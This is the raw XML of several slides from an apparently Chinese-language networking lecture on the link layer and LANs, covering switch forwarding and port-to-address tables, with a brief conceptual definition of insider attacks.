              <a:t>进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>LAN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网段与接口之间的对应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>关系</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机交换机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145410" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>链路层和局域网</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411"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mtClean="0"/>
              <a:t>5-</a:t>
            </a:r>
            <a:fld id="{2A98903C-7AA7-4930-8EEE-50773B6E7076}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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44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4483">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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4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4483">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="404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448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04483">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="404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448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4483">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4044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4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4348"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C424DD00-D085-4A83-A655-2A4ECBB55CA2}"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3325" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>交换机转发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13327" name="Picture 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8382" y="29543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4" name="Object 5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1194619" y="3403600"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636392" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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619" y="3403600"/>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6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3761607" y="3414713"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636393" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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1607" y="341471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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4534719" y="3373438"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636394" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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4719" y="3373438"/>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8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1821682" y="3425825"/>
          <a:ext cx="407987" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636395" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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1682" y="3425825"/>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328" name="Picture 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6219" y="2962275"/>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10"/>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56582" y="2952750"/>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8" name="Object 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2715444" y="3276600"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636396" name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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15444" y="32766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p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3129782" y="3708400"/>
          <a:ext cx="407987" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636397" name="Clip" r:id="rId14" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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9782" y="3708400"/>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p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5920607" y="3248025"/>
          <a:ext cx="407987" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636398" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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0607" y="3248025"/>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1" name="Object 14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5204644" y="3581400"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636399" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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04644" y="3581400"/>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2" name="Object 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="778694" y="2970213"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s636400" name="Clip" r:id="rId20" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63639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8694" y="297021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0" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1135882" y="3117850"/>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1" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1502594" y="3160713"/>
            <a:ext cx="258763" cy="2841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2" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1901057" y="3187700"/>
            <a:ext cx="68262" cy="2651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3" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3083744" y="3152775"/>
            <a:ext cx="328613" cy="195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4" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3380607" y="3170238"/>
            <a:ext cx="120650" cy="5286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5" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3671119" y="3117850"/>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6" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4883969" y="3187700"/>
            <a:ext cx="406400"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7" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5360219" y="3160713"/>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8" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5479282" y="3090863"/>
            <a:ext cx="487362"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3339" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3407594" y="1790700"/>
            <a:ext cx="509588" cy="252413"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13359" name="Line 26"/>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3360" name="Picture 27"/>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61" name="Group 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13362" name="Line 29"/>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63" name="Line 30"/>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3340" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1891532" y="2024063"/>
            <a:ext cx="1581150" cy="9699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1" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3620319" y="2016125"/>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2" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3767957" y="1971675"/>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3" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2032819" y="2816225"/>
            <a:ext cx="80645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3344" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3755257" y="2816225"/>
            <a:ext cx="56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3345" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5571357" y="2765425"/>
            <a:ext cx="56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3346" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3871144" y="1630363"/>
            <a:ext cx="873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3347" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="291782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3348" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1148582" y="3690938"/>
            <a:ext cx="3286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3349" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1805807" y="3703638"/>
            <a:ext cx="325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3350" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2617019" y="35242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3351" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3493319" y="3781425"/>
            <a:ext cx="327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3352" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4136257" y="3497263"/>
            <a:ext cx="322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3353" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4677594" y="3640138"/>
            <a:ext cx="339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3354" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5541194" y="37163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3355" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6287319" y="316230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3356" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3029769" y="18621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3357" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3350444" y="21463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3358" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3775894" y="21066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52" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6839272" y="1967955"/>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 name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7713985" y="1618705"/>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4" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696522" y="1556792"/>
            <a:ext cx="70211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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7802885" y="1998117"/>
            <a:ext cx="493725" cy="267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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6559872" y="1559967"/>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57" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7223447" y="1999705"/>
            <a:ext cx="545021" cy="273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b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</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D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部人员攻击分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意的或非恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部人员有计划的窃听、偷窃或损坏信息，或拒绝其他授权用户的访问。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
